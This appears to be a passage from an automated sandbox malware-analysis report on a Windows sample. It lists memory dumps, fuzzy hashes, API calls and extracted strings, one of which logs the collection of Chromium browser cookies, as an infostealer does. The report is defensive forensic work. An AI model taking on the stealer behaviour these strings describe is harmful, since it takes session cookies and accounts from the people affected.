                  • Opcode Fuzzy Hash: 0cc04cdd94d8eece3e025078eba42f50c6b5e09467b30ccc375827a7c9c48c1a
                  • Instruction Fuzzy Hash: 15F0C83A510517ABC7159B64FC58CABBBBBEF577217A41219F812C3170DB315E82CA60
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
                  • API String ID: 0-168083567
                  • Opcode ID: b79027d2259a5c2527928dec550e178c264597034819a51425dc5b5228cbb11a
                  • Instruction ID: 86f7ae0ec1b39aeffe7756ea10c48714d7b28c029cb688d229ebfe5cc083d8fa
                  • Opcode Fuzzy Hash: b79027d2259a5c2527928dec550e178c264597034819a51425dc5b5228cbb11a
                  • Instruction Fuzzy Hash: 1F816DB550C3829FC314CF28C4A0A6BFBE2AFD9304F198E5DE5A987292D734D945CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
                  • API String ID: 0-168083567
                  • Opcode ID: 7b9c0addef0757f4e4f74ae11d1d361fac07fb7dd0371e9f7fb81efb46ac8083
                  • Instruction ID: 996aa02229cf43db0c72c56ecb42e0d813c6dce7b45e698c45ad9a721171d93b
                  • Opcode Fuzzy Hash: 7b9c0addef0757f4e4f74ae11d1d361fac07fb7dd0371e9f7fb81efb46ac8083
                  • Instruction Fuzzy Hash: 678168B150C3829FC715CF28D4A0AABBBE2AFD5304F148A5DE0DA87392D774D945CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: +bf]$ONKD$WaSS$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$h_]F$omlT$wvKz
                  • API String ID: 0-2751125561
                  • Opcode ID: 2a3b295869076ce447e71a9fd3a012390a02ab1044f18ad58d3709694ef4cfb5
                  • Instruction ID: 384713589161582a7b2c982b7f95b6a19120fa271c3f6c398ceaceba1717ad26
                  • Opcode Fuzzy Hash: 2a3b295869076ce447e71a9fd3a012390a02ab1044f18ad58d3709694ef4cfb5
                  • Instruction Fuzzy Hash: D83152B054D7818BD318CF25C09062AFFE2ABD67A4F28594CE0D11B395CB75C886CB8A
                  APIs
                  • __lock.LIBCMT ref: 006386B9
                    • Part of subcall function 0063AAAF: __mtinitlocknum.LIBCMT ref: 0063AAC1
                    • Part of subcall function 0063AAAF: EnterCriticalSection.KERNEL32(?,?,0063395B,0000000D), ref: 0063AADA
                  • ____lc_codepage_func.LIBCMT ref: 00638702
                  • GetTimeZoneInformation.KERNEL32(00651180,00000000,00000000,00000000,00000000,00000000,0064C940,00000034,0063844D,0064C920,00000008,00631454,00000000,?,0000003C,00000000), ref: 00638809
                  • WideCharToMultiByte.KERNEL32(?,00000000,00651184,000000FF,?,0000003F,00000000,?), ref: 00638884
                  • WideCharToMultiByte.KERNEL32(?,00000000,006511D8,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 006388B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$CriticalEnterInformationSectionTimeZone____lc_codepage_func__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 4287578726-0
                  • Opcode ID: 15dba5b86eb2d76e1f903ca01904981fcd48618dfded57e6e76a4bb8e9aa5e91
                  • Instruction ID: 4352446516cb1826959826d86882fe24a9bc1f95267ac3e5916ba370b920a1bb
                  • Opcode Fuzzy Hash: 15dba5b86eb2d76e1f903ca01904981fcd48618dfded57e6e76a4bb8e9aa5e91
                  • Instruction Fuzzy Hash: 62A1DA719003099EDF259F68D851BEDBBB7AF0A710F68115EF140AB391DB308D41CBA8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +bf]$ONKD$WaSS$h_]F$omlT$wvKz
                  • API String ID: 0-3413313926
                  • Opcode ID: 732d4c0679ead65cfe25c244734bb1766ebb245f61f879a42d21f2afd9798af8
                  • Instruction ID: 9d8fe9ba653ff7dbcebb05ef038b6b1cce994a6de4b03028074263764436cd05
                  • Opcode Fuzzy Hash: 732d4c0679ead65cfe25c244734bb1766ebb245f61f879a42d21f2afd9798af8
                  • Instruction Fuzzy Hash: 863126B054D3818BD3148F2580A072BFFE2ABC6664F28595CE1D51B795CB75C886CB8B
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: *UDF DVD CGMS Info$*UDF FreeEASpace$s+b
                  • API String ID: 2102423945-39572044
                  • Opcode ID: 61ca0514a0aa5cc333172b471246ea2b3fea4003492c13f52cd5a6f75078da17
                  • Instruction ID: 84fdec932ea510d642c4525faf7ce9fa6dfd2e08989d85860cc7ac5b4a700c06
                  • Opcode Fuzzy Hash: 61ca0514a0aa5cc333172b471246ea2b3fea4003492c13f52cd5a6f75078da17
                  • Instruction Fuzzy Hash: 1AB1BDB15047528BDB44CF28D880796BBE2BF49310F1846BEFC89DF346E77099858BA5
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006342EE
                  • GetCurrentThreadId.KERNEL32 ref: 006342FD
                  • GetCurrentProcessId.KERNEL32 ref: 00634306
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00634313
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: 90177ccc61c9764cbc4ce152f37bf6d20e6a8e0f3763d5609f8dc1bc531e2b87
                  • Instruction ID: 47c8cb27ee66202b719dbc08bc86b4271ef21da3ec9afb6bbf8a4856710c529d
                  • Opcode Fuzzy Hash: 90177ccc61c9764cbc4ce152f37bf6d20e6a8e0f3763d5609f8dc1bc531e2b87
                  • Instruction Fuzzy Hash: 1E119E79D052099BDB14CBB8D9544EEB7F6FF49300BA6156BE902E7310EE30AA40CB94
                  APIs
                  • IsIconic.USER32(?), ref: 006220D7
                  • ShowWindow.USER32(?,00000009), ref: 006220E4
                  • DragQueryFileW.SHELL32(?,00000000,?,0000012C), ref: 006220F9
                  • DragFinish.SHELL32(?), ref: 0062212F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Drag$FileFinishIconicQueryShowWindow
                  • String ID:
                  • API String ID: 1426964317-0
                  • Opcode ID: 68ef92798b896b8688411f7470c8e0e789f880e02a6716fe6be37f688844a936
                  • Instruction ID: 5343fd13043dc1f32943fc595c21765734b11c4359b85bfad3a6b8fe4d6aa60a
                  • Opcode Fuzzy Hash: 68ef92798b896b8688411f7470c8e0e789f880e02a6716fe6be37f688844a936
                  • Instruction Fuzzy Hash: 5C01F735600A286FD724AB60BC19FFD737AEF96712F6000A9F605971C0EF715B018A9D
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 6d580f3fa8ed1a3b4afb3090706ec5d6128b00ca25b0f9d8cbffbff15b2d2121
                  • Instruction ID: 86d07c3ae11a4fd49e6e5e4e953ce3363d86c17f49664831cdce105f0bb60002
                  • Opcode Fuzzy Hash: 6d580f3fa8ed1a3b4afb3090706ec5d6128b00ca25b0f9d8cbffbff15b2d2121
                  • Instruction Fuzzy Hash: EE1235768007268FD398EFB5FDA611A37A3FB92312F45B22DE44297166CF3445428EC9
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 89479fb9b213493859ca734b5a702604789e50256db3a8e3eeaa730149f602be
                  • Instruction ID: 37fa8664135e0f097f577dffda73ed39292b3b4c9a731530566b28a89740e1be
                  • Opcode Fuzzy Hash: 89479fb9b213493859ca734b5a702604789e50256db3a8e3eeaa730149f602be
                  • Instruction Fuzzy Hash: 8C121673D107328FC798EFB5FCB611A36A3FB82316F46661EE84297526CA3455018EC9
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 2c227143fe4e0deb8ff43d3b2129de9ffd59d80951cf6e9611684718ff9f2b6f
                  • Instruction ID: a6d3aa81e05ab2e7ff8959751e2f14fbcf261a2aa6a2e6b82fbb2600fc57302c
                  • Opcode Fuzzy Hash: 2c227143fe4e0deb8ff43d3b2129de9ffd59d80951cf6e9611684718ff9f2b6f
                  • Instruction Fuzzy Hash: 18021677D107328FC798EFB5FCB601E3663FB82312F46A61DE84297526CA3454018AD9
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 32da666ff48a38557550a8b123c3099ffa8c2938fc6405b9bd07e710ae43d3c8
                  • Instruction ID: 2c3d9fd220a0f16522d7313e834c54557893639e40c48fd90085c9a52dcc1eb8
                  • Opcode Fuzzy Hash: 32da666ff48a38557550a8b123c3099ffa8c2938fc6405b9bd07e710ae43d3c8
                  • Instruction Fuzzy Hash: 88F14776C007264FD398EFB5FDA611E3663FB92312F85B22DE44297126CE3444428ECA
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: s+b
                  • API String ID: 2102423945-2084237830
                  • Opcode ID: 6cf72652a4db1e52c9a11aa20ac93f2ff37f25ca14292aaf77132ce7e387941f
                  • Instruction ID: 8a3e68224ee30179acce63266e2d3052a9ce55e40a593f19d8721105dae44fae
                  • Opcode Fuzzy Hash: 6cf72652a4db1e52c9a11aa20ac93f2ff37f25ca14292aaf77132ce7e387941f
                  • Instruction Fuzzy Hash: 5EF1AC719087518FCB14CF28D48069ABBE2FF88314F158A6EF8899B352D374E845CF91
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: d880753a1d9b49410a152f12b247d520fa5ff78233c534bd419bb42916aa13be
                  • Instruction ID: e7b1be1ec160a8c5027f075f75e9070251c1fc54e444e8c07217fae42e520eee
                  • Opcode Fuzzy Hash: d880753a1d9b49410a152f12b247d520fa5ff78233c534bd419bb42916aa13be
                  • Instruction Fuzzy Hash: 15D12873D147328FC798EFB9FCB605A3763FB92312F42A62DE84297526CA3415018AD5
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 067190be0af95c2ca630e775221159936b52ce0436b35889725ea4355cc6d07c
                  • Instruction ID: 4ff3c380a866db40ad614cc76cded624d50e1b30ac79a550e2bdf156581e6e3d
                  • Opcode Fuzzy Hash: 067190be0af95c2ca630e775221159936b52ce0436b35889725ea4355cc6d07c
                  • Instruction Fuzzy Hash: 9DC11476C017368FC798EFB5FCA612D3663FB52312F81B21EE84297126CE3444028AC9
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: 5b0bfafd706bb24a9c4eea24f21d9be1122d5b50202f3bdd6e90b56e299f7360
                  • Instruction ID: 5077b6eee84bcff241b3bf69c5460caebb75031ee6021bb84335c533f75b5f3f
                  • Opcode Fuzzy Hash: 5b0bfafd706bb24a9c4eea24f21d9be1122d5b50202f3bdd6e90b56e299f7360
                  • Instruction Fuzzy Hash: 44C11773D107328FC798EFB5FCB605A3663FB92312F42A62DE84697526CA3415018AD9
                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: d4b2d837b779eac78be255ae88e81b2185b8b0e7378c971c05733210ff4eb710
                  • Instruction ID: f9029724ba1459a1b5ee5aab6d670bedbb9ac104c5b97405957a598316586186
                  • Opcode Fuzzy Hash: d4b2d837b779eac78be255ae88e81b2185b8b0e7378c971c05733210ff4eb710
                  • Instruction Fuzzy Hash: B1C1F376C117368FC798EFB5FCA612D3663BB52312F85721EE84297126CE3455018ECA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: ecea99c313fb835ddc67bed3e82df348b2e2e647a9805d05cca988f8d7bbb49b
                  • Instruction ID: 66fc09cbe0f76fab2aecca4097d7648b31ca5d01eb94f170344db3534da71672
                  • Opcode Fuzzy Hash: ecea99c313fb835ddc67bed3e82df348b2e2e647a9805d05cca988f8d7bbb49b
                  • Instruction Fuzzy Hash: C0727A716083409FD724CF18C894B9BBBE2BF8A314F48896DF9898B391D775D944CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: ae9b07aa68c984fb98c592c5617019e2335096fe10a6d80f689ac4aa3b39ade9
                  • Instruction ID: 9aa228ad323b87ad3cf99fd985bf4dd7ae774ae119ee28b18a8ceab547ed34a8
                  • Opcode Fuzzy Hash: ae9b07aa68c984fb98c592c5617019e2335096fe10a6d80f689ac4aa3b39ade9
                  • Instruction Fuzzy Hash: F67249B16183419FEB24CF18C880B9ABBE2BF89314F44892DF9D987391D775D944CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: RMBC$ISO
                  • API String ID: 0-3736530453
                  • Opcode ID: bbd01de57df202e2ffe147973fd77cf7d917416371883bb82c0ae0f2497ea45a
                  • Instruction ID: fd88f0b459e0fd99f8a917a3394086963c6b6f35af1712e86ec3d864b5f18ff7
                  • Opcode Fuzzy Hash: bbd01de57df202e2ffe147973fd77cf7d917416371883bb82c0ae0f2497ea45a
                  • Instruction Fuzzy Hash: AA42ACB0904B419FD724CF29C985B12BBF1FF46204F14869CE8EA8BB95E334E815CB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2PBd$ptF`
                  • API String ID: 0-336479791
                  • Opcode ID: 7e6259e80c704284f44c1a3b97d40ae8bbea013c393dbe37ef04df824034028a
                  • Instruction ID: e996d50db4d242b84227873eb0ec631fa29a781776ffa13066f1ea66c8321c7f
                  • Opcode Fuzzy Hash: 7e6259e80c704284f44c1a3b97d40ae8bbea013c393dbe37ef04df824034028a
                  • Instruction Fuzzy Hash: 11428E70104B808FD329CF28C0A47A7FBE2BF4A344F484A5EC4EB5B686D779A549CB54
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2PBd$ptF`
                  • API String ID: 0-336479791
                  • Opcode ID: fa2f74805cd26863cc785642c9be31b42664ec1e740e4e1cd15f0027f5e5f66c
                  • Instruction ID: cf350d0ea93fe9c6f253aa68cd45cf3563f8a6e90d3525a77993e8f6c0e90289
                  • Opcode Fuzzy Hash: fa2f74805cd26863cc785642c9be31b42664ec1e740e4e1cd15f0027f5e5f66c
                  • Instruction Fuzzy Hash: 57425B70108B808BD32ACF25C0B47E6BBE2BF5A308F444A5EC4DB5B796D779A505CB54
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: G@AB$G@AB
                  • API String ID: 0-3861075807
                  • Opcode ID: 722e67ea6ad497729501b7b8ba04c60ac161c1301fbfebc9ed090c293e701b13
                  • Instruction ID: e08a816f6d24d41dad865028f1ebd7567547cabc0f269f8e5698d1d3ade57060
                  • Opcode Fuzzy Hash: 722e67ea6ad497729501b7b8ba04c60ac161c1301fbfebc9ed090c293e701b13
                  • Instruction Fuzzy Hash: E332CF716183429FC714CF18C590B2AFBE2EBC9314F188A6CF4958B392D775D899CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G@AB$G@AB
                  • API String ID: 0-3861075807
                  • Opcode ID: 8b59017345577f727dedd1df0dfcbb0a8c56d68d78455d67205dc44a51394b6e
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a75bc2f84afebfa25f9753e254f2eccd046ada39263094bb1af7755cf198afac
                  • Instruction ID: 039a83ba8dc8e6385cc7425bf724931d127765440aba3af5247e32c251cef486
                  • Opcode Fuzzy Hash: a75bc2f84afebfa25f9753e254f2eccd046ada39263094bb1af7755cf198afac
                  • Instruction Fuzzy Hash: E6E1387AD153384BEB18CEB99C583BE6553F7D0304F82A26DD847EB689CF3508464AC1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
